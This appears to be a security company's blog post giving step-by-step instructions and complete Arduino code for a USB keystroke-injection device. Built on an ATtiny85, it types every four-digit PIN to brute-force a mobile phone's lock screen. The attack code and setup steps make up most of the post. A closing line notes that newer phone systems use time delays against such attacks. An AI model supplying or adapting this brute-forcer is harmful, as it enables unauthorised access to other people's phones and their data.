Building a key brute forcing device with a ATtiny85

Mark de Groot
July 20, 2021

Building your own usb connected key brute forcing device from scratch with use of a ATiny85 device and Arduino IDE.

In our example we use a ATtiny85 digistump usb device to build a pin code brute forcing device to inject pin codes in the range of 0000 to 9999. Below you see the ATtiny85 device we are using for this blog post.

To make sure you have all of the prerequisites to build the software in the Arduino IDE we first need to download the board files and the keyboard library.

First start your Arduino IDE and click on “File->Preferences” and add “http://digistump.com/package_digistump_index.json” to the Additional Boards Manager URL’s to make sure you support the right boards files for the ATtiny85.

Then Select the right board by selecting “Tools->Boards->Digistum AVR boards->Digispark(Default 16.5mhz)”.

When you have selected the right board the next thing we need to do is downloading the required application libraries. Go to “Tools->Manage libraries” and search for keyboard and install this library.

The last step is to write the code. Below you will see the example code I wrote for the pin brute forcing application.

#include "DigiKeyboard.h"

void setup() {
  pinMode(0, OUTPUT);
  delay(5000); 
}

char buf [11]; 
     
void loop() {

  DigiKeyboard.sendKeyStroke(0);
  for (int i = 0; i <= 10000; i++) {
    sprintf (buf, "%04i", i) ;
    DigiKeyboard.println(buf);
  }
  digitalWrite(0, HIGH);  
  delay(2000);        
  digitalWrite(0, LOW); 
  delay(2000); 
  DigiKeyboard.delay(5000);
}

In the code you will see three application functions one is actually turning the led on and off when there is a PIN code been send, the next is generating the PIN code from 0001 to 9999 and the last step is actual writing the PIN code to the USB interface. In the code you also see some delay’s that is needed to make sure you will not having timing issues. Last step is to compile the code and upload it to the ATtiny85.

When you insert the ATtiny85 PIN brute forcer you can unlock the mobile phone. Note: newer mobile operation systems use time delay techniques to protect mobile phones against these type of attacks.

Share the Post:

Crafting a Strong Password Policy: Your First Line of Defense Against Cyber Threats

In the ever-evolving landscape of cybersecurity, one of the simplest yet most effective measures an organization can take is implementing

Hacking domain controller with zerologon vulnerability CVE-2020-1472

In this how to we are showing the exploitation of CVE-2020-1472 also name the zerologon vulnerability. Zerologon is a vulnerability

Building a key brute forcing device with a ATtiny85

Related Posts

Crafting a Strong Password Policy: Your First Line of Defense Against Cyber Threats

Hacking domain controller with zerologon vulnerability CVE-2020-1472

Onze diensten

Informatie

Contactgegevens